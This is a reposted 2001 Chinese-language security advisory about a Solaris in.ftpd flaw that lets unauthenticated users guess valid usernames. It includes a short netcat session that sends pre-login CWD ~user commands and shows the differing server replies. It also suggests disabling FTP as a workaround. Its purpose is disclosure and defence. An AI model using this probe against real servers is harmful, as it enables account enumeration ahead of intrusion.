![[ 永远的UNIX::UNIX技术资料的宝库 ]](/images/title.gif)
|
| 首页 > 安全技术 > 系统 > 正文 |
 |
| Solaris IN.FTPD CWD 用户名猜测漏洞 |
| 本文出自: 中国红客联盟 http://www.cnhonker.com (2001-06-01 10:08:00) |
受影响的系统:
Solaris 8 (SPARC, x86)
Solaris 7 (SPARC, x86)
Solaris 2.6/2.5以及更低版本 (SPARC, x86)
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 2564
Solaris 所带的in.ftpd没有正确考虑用户登录之前执行某些命令的情况。
因此用户在登录进入系统之前执行某些FTP命令,in.ftpd将会返回一些错
误信息。这可能给攻击者以猜测系统中用户名的机会。
<*来源:Johnny Cyberpunk (johncybpk@gmx.net) *>
测试程序:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
nc vulnerable.host 21
220 gsmms0 FTP server (SunOS 5.6) ready.
cwd ~netadm
530 Please login with USER and PASS.
cwd ~xyz
530 Please login with USER and PASS.
550 Unknown user name after ~
--------------------------------------------------------------------------------
建议:
临时解决方法:
如果您不需要FTP服务,请暂时关闭FTP.
厂商补丁:
暂无
(http://www.fanqiang.com)
进入【UNIX论坛】
|
|
| 相关文章 |
Java源码:实现简单的FTP功能 (2002-01-03 08:10:00)
如何以Solaris架设FTP虚拟系统 (2001-11-01 08:00:01)
ProFtpd快速指南 (2001-10-20 09:05:00)
solaris下匿名FTP安装 (2001-10-02 10:00:00)
远程连接(telnet/ftp/rsh/ssh)作为root的用法和总结 (2001-09-02 13:05:00)
如何使用wu-ftp 2.x(site exec bug)来取得root权限 (2001-07-15 07:05:00)
proFTP中如何将用户限制在自己的home目录下? (2001-07-09 22:09:22)
如何配置WU-FTP服务器 (2001-06-27 08:10:01)
wu-ftpd使用基础 (2001-06-27 07:00:00)
ftp将用户限制在自己目录下的方法 (2001-06-26 13:04:00)
|
===更多相关=== |
|
|
|
★ 樊强制作 欢迎分享 ★ |